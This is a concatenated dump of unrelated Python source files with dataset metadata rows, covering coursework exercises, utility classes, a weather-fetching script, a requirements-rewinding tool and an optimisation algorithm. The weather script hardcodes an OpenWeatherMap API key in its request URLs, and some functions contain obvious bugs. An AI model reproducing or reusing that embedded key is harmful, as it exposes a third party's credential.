turbolist.remove('abc')
self.assertListEqual(turbolist, [3, 1, -2, tuple()])
indices = sorted(turbolist._indices.values())
self.assertListEqual(indices, range(4))
def test_remove_2 (self):
turbolist = self.turbolist
turbolist.remove(3)
turbolist.remove(tuple())
self.assertListEqual(turbolist, [1, -2, 'abc'])
indices = sorted(turbolist._indices.values())
self.assertListEqual(indices, range(3))
if __name__ == '__main__':
unittest.main()
| true |
3afa36e597e1f0024ac3b7ee0c8fcefe67c9dd10 | Python | Hagai-Mozes/University-Python | /ex2.py | UTF-8 | 2,935 | 4.0625 | 4 | [] | no_license | """ Exercise #2. Python for Engineers."""
#########################################
# Question 1 - do not delete this comment
#########################################
a = 8 # Replace the assignment with a positive integer to test your code.
A = [12,4,0,8] # Replace the assignment with other lists to test your code.
for i in A:
if i%a == 0:
print(A.index(i))
break
else:
print(-1)
# End of code for question 1
#########################################
# Question 2 - do not delete this comment
#########################################
B = ['hello', 'world', 'course', 'python', 'day','']
# Replace the assignment with other lists of strings (str) to test your code.
# Write the code for question 2 using a for loop below here.
sum_len = 0
longer_num = 0
for i in B:
sum_len += len(i)
ave_len = sum_len/len(B)
for i in B:
if len(i) > ave_len:
longer_num += 1
print("The number of strings longer than the average is:", longer_num)
# Write the code for question 2 using a while loop below here.
sum_len = 0
longer_num = 0
my_str = ""
i=0
j=0
while i<(len(B)):
my_str = B[i]
sum_len += len(my_str)
i +=1
ave_len = sum_len/len(B)
while j<(len(B)):
my_str = B[j]
if len(my_str)>ave_len:
longer_num +=1
j+=1
print("The number of strings longer than the average is:", longer_num)
# Write the rest of the code for question 2 below here.
# End of code for question 2
#########################################
# Question 3 - do not delete this comment
#########################################
C = [0] # Replace the assignment with other lists to test your code.
# Write the rest of the code for question 3 below here.
pro_sum = 0
i = 0
if len(C) == 1:
pro_sum = C[0]
else:
while i < (len(C)-1):
pro_sum += C[i]*C[i+1]
i+=1
print (pro_sum)
# End of code for question 3
#########################################
# Question 4 - do not delete this comment
#########################################
D = [1, 3,80,-80] # Replace the assignment with other lists to test your code.
# Write the rest of the code for question 4 below here.
new_lst = D[0:2]
my_diff = abs(D[1]-D[0])
for i in D[2::]:
if abs(i-new_lst[-1]) > my_diff:
my_diff = abs(i-new_lst[-1])
new_lst.append(i)
print(new_lst)
# End of code for question 4
#########################################
# Question 5 - do not delete this comment
#########################################
my_string = 'hfhbhffhfh' # Replace the assignment with other strings to test your code.
k = 2 # Replace the assignment with a positive integer to test your code.
# Write the rest of the code for question 5 below here.
for i in my_string:
if my_string.find(i*k) > -1:
print ("For length %s, found the substring %s!"%(k,i*k))
break
else:
print ("Didn't find a substring of length",k)
# End of code for question 5
| true |
d1c955ed6dfd6926c64ef662062986d7603578b4 | Python | stevenhorsman/advent-of-code-2019 | /day-05/sunny_with_asteroids.py | UTF-8 | 617 | 3.515625 | 4 | [] | no_license | import sys
from ship_computer import ShipComputer
input_file = 'day-05/input.txt'
def part1(memory, input = 1):
memory = memory.split(",").copy()
ship_computer = ShipComputer(memory, input)
ship_computer.execute()
return ship_computer.get_output()
def part2(input):
pass
for noun in range(1, 100):
for verb in range(1, 100):
if part1(input, str(noun), str(verb)) == 19690720:
return 100 * noun + verb
if __name__ == "__main__":
with open(input_file) as f:
data = f.read()
print("Part 1: ", part1(data))
print("Part 2: ", part2(data))
| true |
e959db41a5647bdf3ec5d130be5896f61581f396 | Python | vaioco/sys2syz | /core/utils.py | UTF-8 | 3,418 | 2.703125 | 3 | [
"MIT",
"Apache-2.0"
] | permissive | # Module : Utils.py
# Description : Contains basic utility functions required for all modules
import os
import subprocess
import logging
import shutil
class Utils(object):
ENV_NONE = 0
def __init__(self, cwd):
self.cwd = cwd
@staticmethod
def file_exists(path, exit=False):
if os.path.isfile(path):
return True
else:
logging.warn("[+] No file found at %s" % path)
if exit:
exit(0)
return False
@staticmethod
def dir_exists(path, exit=False):
if os.path.isdir(path):
return True
else:
logging.warn("[+] No file found at %s" % path)
if exit:
exit(0)
return False
@staticmethod
def compile_file(file, args, exit=False):
# TODO: complete this
subprocess.check_call()
@staticmethod
def create_dir(path):
if os.path.exists(path):
logging.debug("Directory already exists not creating")
return False
else:
try:
os.mkdir(path)
except Exception as e:
logging.exception(e)
logging.critical("Unable to create directory")
return False
return True
@staticmethod
def delete_dir(path):
if os.path.isdir(path):
shutil.rmtree(path)
return True
else:
logging.debug("Unable to delete directory")
def delete_file(path):
if os.path.isfile(path):
os.remove(path)
else:
logging.warn("[+] No file found at %s" % path)
def get_env(self, version):
my_env = os.environ.copy()
if version == self.ENV_NONE:
return my_env
def run_cmd(self, command, env=ENV_NONE, doexit=False):
try:
subprocess.check_call(command, env=self.get_env(env), shell=True, cwd=self.cwd)
except Exception as e:
logging.exception(e)
logging.critical("Unable to run command : {}".format(command))
if doexit:
exit(-1)
def run_silent_cmd(self, command, env=ENV_NONE, doexit=False):
try:
subprocess.check_call(command, env=self.get_env(env), shell=True, cwd=self.cwd, stderr=subprocess.DEVNULL, stdout=subprocess.DEVNULL)
except Exception as e:
logging.exception(e)
logging.critical("Unable to run command : {}".format(command))
if doexit:
exit(-1)
def run_and_get_output(self, command, env=ENV_NONE, doexit=False):
try:
out = subprocess.check_output(command, env=self.get_env(env), cwd=self.cwd, shell=True, stderr=subprocess.STDOUT)
return out
except Exception as e:
logging.exception(e)
logging.critical("Unable to run command : {}".format(command))
if doexit:
exit(-1)
def file_exists(path, exit=False):
if os.path.isfile(path):
return True
else:
logging.warn("[+] No file found at %s" % path)
if exit:
exit(0)
return False
def dir_exists(path, exit=False):
if os.path.isdir(path):
return True
else:
logging.warn("[+] No file found at %s" % path)
if exit:
exit(0)
return False | true |
837f52eeeaf098923d406bc43cb783dc47236099 | Python | VladislavBannikov/py-adv_1.4.Decorators | /main.py | UTF-8 | 135 | 2.546875 | 3 | [] | no_license | from time_logger import logger_decorator_factory
@logger_decorator_factory('log.txt')
def add(a,b):
return a+b
print(add(4,5))
| true |
90568aa6d149e2e691f6ee7070bdc0d4ef6c47e9 | Python | regbrown99/PackingListGenerator | /PackingListGenerator/getWeather.py | UTF-8 | 5,827 | 3.4375 | 3 | [] | no_license | #! /usr/bin/python3
# getWeather.py - Prints the weather for a location from the command line.
def getWeather(zip_code, city, country):
"""This function retrieves weather from OpenWeatherMap.org's API for a given city or zip code.
This can be set up to retrieve current weather and/or a weather forecast."""
import json, requests
# *****START CODE FROM ATBS*****
# import sys
# Compute location from command line arguments.
#if len(sys.argv) < 2:
# print('Usage: quickWeather.py location')
# sys.exit()
# location = ' '.join(sys.argv[1:])
# *****END CODE FROM ATBS*****
# Download the JSON data from OpenWeatherMap.org's API.
# Code from ATBS: url = 'http://api.openweathermap.org/data/2.5/forecast/daily?q=%s&cnt=3' % (location)
# To call API, use this URL: http://api.openweathermap.org/data/2.5/forecast?id=524901&APPID={APIKEY}
# My API key: 5482b2a3705d25d98c10f9364b53caee
my_api_key = '5482b2a3705d25d98c10f9364b53caee'
# url = 'http://api.openweathermap.org/data/2.5/forecast?id=524901&APPID=5482b2a3705d25d98c10f9364b53caee'
url = 'http://api.openweathermap.org/data/2.5/weather?zip=%s&APPID=%s' % (zip_code, my_api_key)
# To api call by city name
# api.openweathermap.org/data/2.5/weather?q={city name}
# api.openweathermap.org/data/2.5/weather?q={city name},{country code}
# Examples:
# api.openweathermap.org/data/2.5/weather?q=London
# api.openweathermap.org/data/2.5/weather?q=London,uk
# To api call by zip code
# api.openweathermap.org/data/2.5/weather?zip={zip code},{country code}
# Example:
# api.openweathermap.org/data/2.5/weather?zip=94040,us
# Please note if country is not specified then the search works for USA as a default.
response = requests.get(url)
response.raise_for_status()
# Load JSON data into a Python variable.
weatherData = json.loads(response.text)
# Print weather descriptions.
# print(json.dumps(r.json(), indent=2))
print('Using json.dumps... ')
print(json.dumps(response.json(), indent=2))
print()
print('Using response.json... ')
print(response.json())
# *****START CODE FROM ATBS*****
# Below code is from ATBS, but didn't work when I ran it on Cloud9, perhaps because I mistakenly ran it using python2
# w = weatherData
# print('Current weather in %s: ' % (zip_code))
# print(w[0]['weather'][0]['main'], '-', w[0]['weather'][0]['description'])
# print()
# print('Tomorrow: ')
# print(w[1]['weather'][0]['main'], '-', w[1]['weather'][0]['description'])
# print()
# print('Day after tomorrow: ')
# print(w[2]['weather'][0]['main'], '-', w[2]['weather'][0]['description'])
# *****END CODE FROM ATBS*****
# TODO: test ATBS code using python3 instead of 2
# TODO: return weather data as a dictionary that can be passed to temperatureMapping
return weatherData
def getCurrentWeather(zip_code, city, country):
import json, requests
my_api_key = '5482b2a3705d25d98c10f9364b53caee'
zip_url = 'http://api.openweathermap.org/data/2.5/weather?zip=%s&APPID=%s' % (zip_code, my_api_key)
city_url = 'http://api.openweathermap.org/data/2.5/weather?q=%s&APPID=%s' % (city, my_api_key)
city_country_url = 'http://api.openweathermap.org/data/2.5/weather?q=%s,%s&APPID=%s' % (city, country, my_api_key)
zip_response = requests.get(zip_url)
zip_response.raise_for_status()
zipCurrentWeatherData = json.loads(zip_response.text)
city_response = requests.get(city_url)
city_response.raise_for_status()
cityCurrentWeatherData = json.loads(city_response.text)
city_country_response = requests.get(city_country_url)
city_country_response.raise_for_status()
cityCountryCurrentWeatherData = json.loads(city_country_response.text)
return zipCurrentWeatherData, cityCurrentWeatherData, cityCountryCurrentWeatherData
def getForecastWeather(zip_code, city, country):
import json, requests
my_api_key = '5482b2a3705d25d98c10f9364b53caee'
zip_url = 'http://api.openweathermap.org/data/2.5/forecast?zip=%s&APPID=%s' % (zip_code, my_api_key)
city_url = 'http://api.openweathermap.org/data/2.5/forecast?q=%s&APPID=%s' % (city, my_api_key)
city_country_url = 'http://api.openweathermap.org/data/2.5/forecast?q=%s,%s&APPID=%s' % (city, country, my_api_key)
zip_response = requests.get(zip_url)
zip_response.raise_for_status()
zipWeatherForecastData = json.loads(zip_response.text)
city_response = requests.get(city_url)
city_response.raise_for_status()
cityWeatherForecastData = json.loads(city_response.text)
city_country_response = requests.get(city_country_url)
city_country_response.raise_for_status()
cityCountryWeatherForecastData = json.loads(city_country_response.text)
return zipWeatherForecastData, cityWeatherForecastData, cityCountryWeatherForecastData
def temperatureMapping(temperature):
"""This function takes a temperature and maps it to my own temperature description.
Input: temperature
Output: a verbal description of temperature based on the number that was input."""
if temperature >= 95:
tempDescription = 'Really Hot'
elif temperature >= 85:
tempDescription = 'Hot'
elif temperature >= 75:
tempDescription = 'Warm'
elif temperature >= 65:
tempDescription = 'Cool'
elif tempDescription >= 55:
tempDescription = 'Chilly'
elif tempDescription >= 45:
tempDescription = 'Cold'
else:
tempDescription = 'Really Cold'
return tempDescription
if __name__ == '__main__':
zip_code = 77494
city = 'Katy'
country = 'us'
print('Returning weatherData variable...')
print(getWeather(zip_code, city, country))
| true |
4f574b66e9310fe514cd554f1c3c7db444808249 | Python | py1-10-2017/rgero215_PY1-10-2017 | /Store/store.py | UTF-8 | 3,127 | 3.328125 | 3 | [
"MIT-0"
] | permissive | class Store(object):
"""docstring for Store."""
def __init__(self, location, owner):
super(Store, self).__init__()
self.Product = []
self.location = location
self.owner = owner
def inventory(self):
count = 0
for product in self.Product:
count += 1
print '''{}- {}: '''.format(count, product.item_name)
print product.displayInfo()
print '**************************************************'
return self
def add(self, Product):
self.Product.append(Product)
print '''{} has been succefully added to the inventory
=========================================='''.format(Product.item_name)
return self
def remove(self, item_name):
try:
for product in self.Product:
if product.item_name == item_name:
self.Product.remove(product)
print "{} has been remove from the inventory".format(product.item_name)
except ValueError:
print "{} is not in the inventory".format(Product)
return self
class Product(object):
"""docstring for Product."""
def __init__(self, price, item_name, weight, brand):
super(Product, self).__init__()
self.price = price
self.item_name = item_name
self.weight = weight
self.brand = brand
self.status = 'for sale'
self.tax = None
def displayInfo(self):
print '''Price: ${} + taxes
Item Name: {}
Weight: {}lb
Brand: {}
Status: {}
======================================='''.format(self.price, self.item_name, self.weight, self.brand, self.status)
return self
def sell(self):
self.status = 'sold'
return self
def addTax(self,tax):
tax = float(tax) / 100
total = self.price + self.price * tax
print '''Total price for the {} is ${}
========================================'''.format(self.item_name, total)
self.tax = tax
return total
def return_item(self,reason):
if reason == 'defective':
self.status = reason
self.price = 0
print ''' This itme has been returned as {}'''.format(reason)
elif reason == 'like new' or reason == 'in the box':
self.status = 'for sale'
print ''' This itme has been return {}'''.format(reason)
elif reason == 'opened':
total = self.price - float(self.price) * 0.20
self.status = 'used'
self.price = total
print ''' This itme has been return and the box has been {}'''.format(reason)
return self
product1 = Product(200, 'iPad', 2, 'Apple')
product2 = Product(100, 'Head Phone', 1, 'Beats')
product3 = Product(600, 'iPhone', 1, 'Apple')
product4 = Product(250, 'HD Monitor', 25, 'Samsugn')
product5 = Product(100, 'iPhone Case', 1, 'Mophie')
store1 = Store( 'Santiago', 'Ramon Geronimo')
store1.add(product1)
store1.add(product2)
store1.add(product3)
store1.add(product4)
store1.add(product5)
store1.inventory()
store1.remove('iPad').inventory()
| true |
f093853b72e1566842b6a1935b4b91aa09560e59 | Python | JARS29/RST_psychopy | /RST.py | UTF-8 | 2,823 | 3.03125 | 3 | [] | no_license | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import time
from trials import *
experiment_session = 2
text_instructions = "Bem-vindo ao experimento\nA seguir, você vai encontar uma série de frases apresentadas em sequências de 2, 3, 4, 5, 6 sentenças (em ordem aleatória).\n" \
"Sua tarefa vai ser ler as frases de forma natural, em voz alta e tentar lembrar a última palavra de cada sentença.\nUm simbolo '+' vai parecer no momento quando você deve " \
"dizer as palavras a serem lembradas (em qualquer ordem).\n \n" \
"Vamos praticar, presione qualquer tecla para começar um sesão de prática."
text_instructions_s1 = "Preparado?\nVamos começar com o experimento. Presione qualquer tecla para começar a primeira sessão."
text_final_s1 = "Pronto!!!\nA primeira sessão terminou. Aguarde ao experimentador para responder as perguntas."
text_instructions_s2 = "Preparado?\nVamos começar com o experimento. Presione qualquer tecla para começar a segunda sessão."
text_final_s2 = "Pronto!!!\nO experimento terminou. Aguarde ao experimentador para responder as perguntas dessa sessão.\n \n" \
"Muito obrigado pela participação."
# Store info about the experiment session
expName = 'Reading Span Test' # from the Builder filename that created this script
if experiment_session == 1:
expInfo = {u'Session': u'01', u'Participant': u''}
thisExp = setting_exp(expName, expInfo)
# Setup monitor
win = setting_monitor('default', 80, expInfo)
# Instructions trial
instructions_trial(win, text_instructions)
# Practice trial
sentences_practice='common\sentences_practice.xlsx'
practice_trial(win,sentences_practice,thisExp,expInfo)
# Final instructions before experiment
instructions_trial(win, text_instructions_s1)
# Experiment session 1
# Sentences_session _1
sentences_s1 = 'common\sentences_s1.xlsx'
experiment_trial(win, sentences_s1, thisExp, expInfo)
#Final message session 1
instructions_trial(win, text_final_s1)
thisExp.abort() # or data files will save again on exit
win.close()
core.quit()
elif experiment_session == 2:
expInfo = {u'Session': u'02', u'Participant': u''}
thisExp = setting_exp(expName, expInfo)
# Setup monitor
win = setting_monitor('default', 80, expInfo)
# Instructions for the second session
instructions_trial(win, text_instructions_s2)
# Experiment session 2
# Sentences_session 2
sentences_s2 = 'common\sentences_s2.xlsx'
experiment_trial(win, sentences_s2, thisExp, expInfo)
# Final message session 2 and experiment
instructions_trial(win, text_final_s2)
thisExp.abort() # or data files will save again on exit
win.close()
core.quit() | true |
54c98511504bebcd81766a448d2afbe7a2a9080a | Python | stehrenberg/HomeAutomation | /python_examples/python/demo_function.py | UTF-8 | 2,632 | 4.59375 | 5 | [] | no_license | # python function
# see also http://www.tutorialspoint.com/python/python_functions.htm
from __future__ import print_function, division
def SayHello(p_name):
"""This is the documentation string of the function.
The function prints 'Hello p_name!'
There is no return value."""
print("Hello ", p_name, "!", sep='')
return # not really necessary but recommended
help(SayHello)
SayHello("Hubert")
print("------------------------------------------------------")
# numbers, strings and tuples are immutable arguments and passed to the function by copy
def ChangeNumber(n):
"""The argument n will be left unchanged outside the function"""
n = n + 1
return n
my_n = 100
new_n = ChangeNumber(my_n)
print("value of my_n after calling ChangeNumber():", my_n)
print("return value of ChangeNumber():", new_n)
# function arguments that are mutable are passed by reference (lists, dictionaries, objects) !!
# note: the following function definition is considered bad style
def ChangeList(l):
"""The argument l (as a list) will be changed also outside the function.
This is called a side-effect of the function call."""
l.append(33)
return
my_list = [1,2,3]
ChangeList(my_list)
print("value of my_list after calling ChangeList():", my_list)
print("------------------------------------------------------")
# function arguments with default values
def SumUpNumbers(n, start=1, step=1):
"""Demonstration of optional arguments with default values."""
s = 0
i = start
end = start + n*step
while i < end:
s = s + i
i += step
return s
s = SumUpNumbers(100)
print("sum of 100 integers starting from 1 is", s)
s = SumUpNumbers(100, 100)
print("sum of 100 integers starting from 100 is", s)
s = SumUpNumbers(100, step=2)
print("sum of 100 integers starting from 1 and with step 2 is", s)
s = SumUpNumbers(100, 200, 2)
print("sum of 100 integers starting from 200 and with step 2 is", s)
s = SumUpNumbers(100, step=2, start=200)
print("sum of 100 integers starting from 200 and with step 2 is", s)
print("------------------------------------------------------")
# variable length arguments
# the list of variable length must follow the mandatory arguments
def PrintNumbers(arg1, *argv): # *argv is a list, **argv is a dict
"""Demonstration of vaiable length arguments."""
print(arg1) # mandatory argument
for a in argv:
print(a)
print("number of variable arguments was:", len(argv))
return
PrintNumbers(10)
PrintNumbers(10,20,30,40)
| true |
2d9050a02ec16a8ef1066e5ac46424a881196c6c | Python | vais-ral/CCPi-Framework | /Wrappers/Python/cil/optimisation/algorithms/FISTA.py | UTF-8 | 4,048 | 2.90625 | 3 | [
"GPL-3.0-only",
"Apache-2.0"
] | permissive | # -*- coding: utf-8 -*-
# This work is part of the Core Imaging Library (CIL) developed by CCPi
# (Collaborative Computational Project in Tomographic Imaging), with
# substantial contributions by UKRI-STFC and University of Manchester.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from cil.optimisation.algorithms import Algorithm
from cil.optimisation.functions import ZeroFunction
import numpy
import warnings
class FISTA(Algorithm):
r'''Fast Iterative Shrinkage-Thresholding Algorithm
Problem :
.. math::
\min_{x} f(x) + g(x)
|
Parameters :
:param initial: Initial guess ( Default initial = 0)
:param f: Differentiable function
:param g: Convex function with " simple " proximal operator
Reference:
Beck, A. and Teboulle, M., 2009. A fast iterative shrinkage-thresholding
algorithm for linear inverse problems.
SIAM journal on imaging sciences,2(1), pp.183-202.
'''
def __init__(self, initial=None, f=None, g=ZeroFunction(), **kwargs):
'''FISTA algorithm creator
initialisation can be done at creation time if all
proper variables are passed or later with set_up
Optional parameters:
:param initial: Initial guess ( Default initial = 0)
:param f: Differentiable function
:param g: Convex function with " simple " proximal operator'''
super(FISTA, self).__init__(**kwargs)
if kwargs.get('x_init', None) is not None:
if initial is None:
warnings.warn('The use of the x_init parameter is deprecated and will be removed in following version. Use initial instead',
DeprecationWarning, stacklevel=4)
initial = kwargs.get('x_init', None)
else:
raise ValueError('{} received both initial and the deprecated x_init parameter. It is not clear which one we should use.'\
.format(self.__class__.__name__))
if initial is not None and f is not None:
self.set_up(initial=initial, f=f, g=g)
def set_up(self, initial, f, g=ZeroFunction()):
'''initialisation of the algorithm
:param initial: Initial guess ( Default initial = 0)
:param f: Differentiable function
:param g: Convex function with " simple " proximal operator'''
print("{} setting up".format(self.__class__.__name__, ))
self.y = initial.copy()
self.x_old = initial.copy()
self.x = initial.copy()
self.u = initial.copy()
self.f = f
self.g = g
if f.L is None:
raise ValueError('Error: Fidelity Function\'s Lipschitz constant is set to None')
self.invL = 1/f.L
self.t = 1
self.configured = True
print("{} configured".format(self.__class__.__name__, ))
def update(self):
self.t_old = self.t
self.f.gradient(self.y, out=self.u)
self.u.__imul__( -self.invL )
self.u.__iadd__( self.y )
self.g.proximal(self.u, self.invL, out=self.x)
self.t = 0.5*(1 + numpy.sqrt(1 + 4*(self.t_old**2)))
self.x.subtract(self.x_old, out=self.y)
self.y.axpby(((self.t_old-1)/self.t), 1, self.x, out=self.y)
self.x_old.fill(self.x)
def update_objective(self):
self.loss.append( self.f(self.x) + self.g(self.x) )
| true |
254ada402b28d66fa13cde3e59209e464232714e | Python | Mulan-94/pyrewind | /pyrewind/pyrewind.py | UTF-8 | 5,764 | 2.828125 | 3 | [
"MIT"
] | permissive | #/usr/bin/python3
# Author: L. A. L. Andati
# Find infos at: https://wiki.python.org/moin/PyPIJSON
import logging
import requests
import sys
from argparse import ArgumentParser
from datetime import datetime
def get_release_dates(package):
# the pypi url including the dates
url = f"https://pypi.org/pypi/{package}/json"
logging.debug(f"Currently getting package: {package}")
# make get request
res = requests.get(url)
# ensure code is 200
status_code = res.status_code
# logging.info(f"Request returns status code: {status_code}")
output = {}
if res.ok:
# api returns JSON
data = res.json()
# get some info
p_info = data["info"]
author = p_info["author"]
name = p_info["name"]
curr_version = p_info["version"]
# keys here are the release versions
r_info = data["releases"]
# release info
release_dates = {}
for rel_version in r_info:
mini_releases = r_info[rel_version]
if len(mini_releases) > 0:
# latest mini_releas's uptime
up_time = mini_releases[-1]['upload_time']
release_dates[up_time] = rel_version
else:
continue
sorted_dates = sorted(list(release_dates.keys()))
sorted_release_dates = {d: release_dates[d] for d in sorted_dates}
output["package_name"] = name
output["author"] = author
output["latest_version"] = curr_version
output["release_dates"] = sorted_release_dates
output["error"] = 0
else:
logging.warning(f"Package: {package} returned status code: {status_code}")
logging.warning("Query has failed")
output["package_name"] = package
output["error"] = -1
# close connection
res.close()
logging.debug("Closing connection")
return output
def parse_required_release(package, before):
"""Get the latest package version before a certain date
before: date in format dd-mm-yyyy
Before this get package version for release before or on this date
package: string
Name of the python package
"""
info = get_release_dates(package)
if info["error"] == 0:
before = datetime.strptime(before, "%d-%m-%Y")
release_dates = info["release_dates"]
p_name = info["package_name"]
# traverse the list in reverse order (starting from most recent)
rd_keys = list(release_dates.keys())
# earliest_release
er = datetime.strptime(rd_keys[0], "%Y-%m-%dT%H:%M:%S")
release = None
# starting from the most recent release
for da in reversed(rd_keys):
curr = datetime.strptime(da, "%Y-%m-%dT%H:%M:%S")
if curr < before:
release = release_dates[da]
break
if release is None:
logging.warning(f"{package} was not released before {before.day}-{before.month}-{before.year}")
logging.warning(f"Earliest release is version: {release_dates[rd_keys[0]]}, released on: {er.day}-{er.month}-{er.year}")
logging.info(f"Latest release: {info['latest_version']}")
result = -1
else:
result = f"{p_name}=={release}"
else:
result = info["error"]
return result
def read_reqs_file(rfile):
with open(rfile, 'r') as rf:
reqs = rf.readlines()
reqs = [x.strip('\n') for x in reqs]
reqs = [x.split("==")[0] for x in reqs]
return reqs
def get_argparse():
parser = ArgumentParser(
usage="pyrewind [options] <value>",
description="Take your requirements' versions back in time :)")
required = parser.add_argument_group("Required arguments")
required.add_argument("--before",
help="""Get versions of requirements in
requirements file before this
date. Format must be 'dd-mm-yyyy'""",
dest="before", type=str, metavar="", default=None)
# store_true when argument is provided
required.add_argument("--debug",
help="Enable debugging mode",
dest="debug", action="store_true")
required.add_argument("-if", "--input-file",
help="File containing the current requirements",
dest="ifile", type=str, metavar="", default=None)
required.add_argument("-of", "--output-file",
help="""Name to give generated output file name
containing the new (older) requirements. Including
the file extension eg. retro.txt""",
dest="ofile", type=str, metavar="",
default="retro.txt")
return parser
def main():
parser = get_argparse()
options = parser.parse_args()
if options.debug:
level = 10
else:
level = 20
logging.basicConfig(
level=level,
format='%(asctime)s - %(levelname)s - %(filename)s - %(message)s')
reqs = read_reqs_file(options.ifile)
n_reqs = len(reqs)
logging.info(f"Found {n_reqs} requirements.")
rels = []
skipped = []
for i, req in enumerate(reqs, 1):
logging.info(f"Package: {i} / {n_reqs}")
rel = parse_required_release(req, options.before)
if rel == -1:
skipped.append(req)
continue
else:
rels.append(f"{rel}\n")
with open(options.ofile, 'w') as wf:
wf.writelines(rels)
logging.info(f"Done writing file to: {options.ofile}")
logging.info(f"Skipped packages: {', '.join(skipped)}")
| true |
8e21b2511268c967bded8bfb81270be38a290556 | Python | kiraplenkin/Stepik_python | /1.5-Введение в классы-9.py | UTF-8 | 461 | 3.515625 | 4 | [] | no_license | class Buffer:
def __init__(self):
self.buf = []
def add(self, *a):
i = 0
while i < len(a):
self.buf.append(a[i])
if len(self.buf) >= 5:
self.sum = 0
for n in range(len(self.buf)):
self.sum += self.buf[n]
print(self.sum)
self.buf = self.buf[5:]
i += 1
def get_current_part(self):
return self.buf
| true |
6905a454932f60a0a1ba54a2c58c813a785ca1e5 | Python | Anmol6/DNGO-BO | /models/model_basis.py | UTF-8 | 2,618 | 2.671875 | 3 | [] | no_license | import tensorflow as tf
import numpy as np
'''
Specifies model used as basis function
for linear input-output mapping
'''
class BasisModel():
'''
initializes model specified here
'''
def __init__(self,dim_in,train_mode = True ):
self._dim_input = dim_in
dim_output = 1
n_hidden1 = 20
n_hidden2 = 40
n_hidden3 = 30
self._basis_dim = n_hidden3
self._train_mode = train_mode
if(train_mode == True):
self._x_in = tf.placeholder(tf.float32, shape = [None,self._dim_input],name="plzwork1")
self._x_inn = self._x_in
else:
with tf.name_scope("trainable_basis_model"):
self._x_in = tf.placeholder(tf.float32, shape = [1,self._dim_input],name="plzwork2")
init_val = np.random.normal(size = (1,self._dim_input))
self._x_inn = tf.Variable(init_val,name = "wrtin",dtype= tf.float32)
self._var_op = tf.assign(ref = self._x_inn, value=self._x_in, validate_shape = False)
self._w1 = tf.Variable(tf.truncated_normal([self._dim_input,n_hidden1]))
self._b1 = tf.Variable(tf.zeros([n_hidden1]))
l1 = tf.nn.sigmoid(tf.matmul(self._x_inn,self._w1) + self._b1)
self._w2 = tf.Variable(tf.truncated_normal([n_hidden1,n_hidden2]))
self._b2 = tf.Variable(tf.zeros([n_hidden2]))
l2 = tf.nn.sigmoid(tf.matmul(l1,self._w2) + self._b2)
self._w3 = tf.Variable(tf.truncated_normal([n_hidden2,n_hidden3]))
self._b3 = tf.Variable(tf.zeros([n_hidden3]))
self._l3 = tf.nn.sigmoid(tf.matmul(l2,self._w3) + self._b3) #this output is the basis function
self._w4 = tf.Variable(tf.truncated_normal([n_hidden3,dim_output]))
self._b4 = tf.Variable(tf.zeros([dim_output]))
self._y_pred = tf.matmul(self._l3,self._w4) + self._b4
#Saver object for saving nnet parameters
self._save_params = tf.train.Saver({"w1":self._w1, "b1": self._b1,"w2":self._w2, "b2": self._b2,"w3":self._w3, "b3": self._b3, "w4":self._w4, "b4": self._b4})
def get_params(self):
if(self._train_mode):
return self._x_in, self._y_pred
else:
return self._x_in, self._x_inn, self._y_pred, self._l3, self._var_op, self._basis_dim
def save_model(self,sess,path):
save_path = self._save_params.save(sess, path + 'model.ckpt')
return save_path
def load_model(self, sess, path):
self._save_params.restore(sess, path)
| true |
6da6d17b173138a4143282fc90b852d25972990b | Python | PavlovStanislav/Pytnon | /Lab_5.py | UTF-8 | 1,087 | 3.859375 | 4 | [] | no_license | from random import randint
import time
def dice_throw():
plr1_pts=0
plr2_pts=0
a = str(input("Input player 1 name: "))
b = str(input("Input player 2 name: "))
plr1=a[:]
plr2=b[:]
print(a)
print(b)
for i in range(1,6):
print("Next run, number: ", i)
print(plr1,'`s turn now')
time.sleep(2)
n1 = randint(1, 6)
print('Number is: ', n1)
print(plr2,'`s turn now')
time.sleep(2)
n2 = randint(1, 6)
print('Number is: ', n2)
if n1 > n2:
print(plr1, 'wins.')
plr1_pts+=1
elif n1 < n2:
print(plr2, 'wins.')
plr2_pts+=1
else:
print('Draw')
plr1_pts+=0.5
plr1_pts+=0.5
if plr1_pts>plr2_pts:
print(plr1 + ' Wins. '+ " Points: "+ str(plr1_pts))
elif plr1_pts<plr2_pts:
print(plr2 + ' Wins. '+ " Points: " + str(plr2_pts))
else:
print('Draw: ', plr1_pts, "+",plr2_pts);
b = dice_throw();
| true |
b22b59a28a68a7a78d5b8f42bccf12d75b3692d1 | Python | BNUCNL/FreeROI | /froi/widgets/clusterstatsdialog.py | UTF-8 | 4,118 | 2.53125 | 3 | [
"BSD-3-Clause"
] | permissive | # emacs: -*- mode: python; py-indent-offset: 4; indent-tabs-mode: nil -*-
# vi: set ft=python sts=4 ts=4 sw=4 et:
from PyQt4.QtCore import *
from PyQt4.QtGui import *
from ..interface import csv
class ClusterStatsDialog(QDialog):
"""A dialog for reporting cluster stats."""
def __init__(self, cluster_info, parent=None):
super(ClusterStatsDialog, self).__init__(parent)
self._cluster_info = cluster_info
self.setWindowModality(Qt.NonModal)
self.setWindowFlags(Qt.Tool | \
Qt.CustomizeWindowHint | \
Qt.WindowTitleHint)
self._init_gui()
self._create_actions()
def _init_gui(self):
"""Initialize GUI."""
# set dialog title
self.setWindowTitle("Cluster Stats")
# initialize widgets
scroll_content = QWidget()
cluster_idx = QLabel("Index")
cluster_idx.setAlignment(Qt.AlignCenter)
peak_val = QLabel("Peak")
peak_val.setAlignment(Qt.AlignCenter)
peak_coord_x = QLabel("Peak_X")
peak_coord_x.setAlignment(Qt.AlignCenter)
peak_coord_y = QLabel("Peak_Y")
peak_coord_y.setAlignment(Qt.AlignCenter)
peak_coord_z = QLabel("Peak_Z")
peak_coord_z.setAlignment(Qt.AlignCenter)
cluster_extent = QLabel("Size")
cluster_extent.setAlignment(Qt.AlignCenter)
# layout config
grid_layout = QGridLayout()
grid_layout.addWidget(cluster_idx, 0, 0)
grid_layout.addWidget(peak_val, 0, 1)
grid_layout.addWidget(peak_coord_x, 0, 2)
grid_layout.addWidget(peak_coord_y, 0, 3)
grid_layout.addWidget(peak_coord_z, 0, 4)
grid_layout.addWidget(cluster_extent, 0, 5)
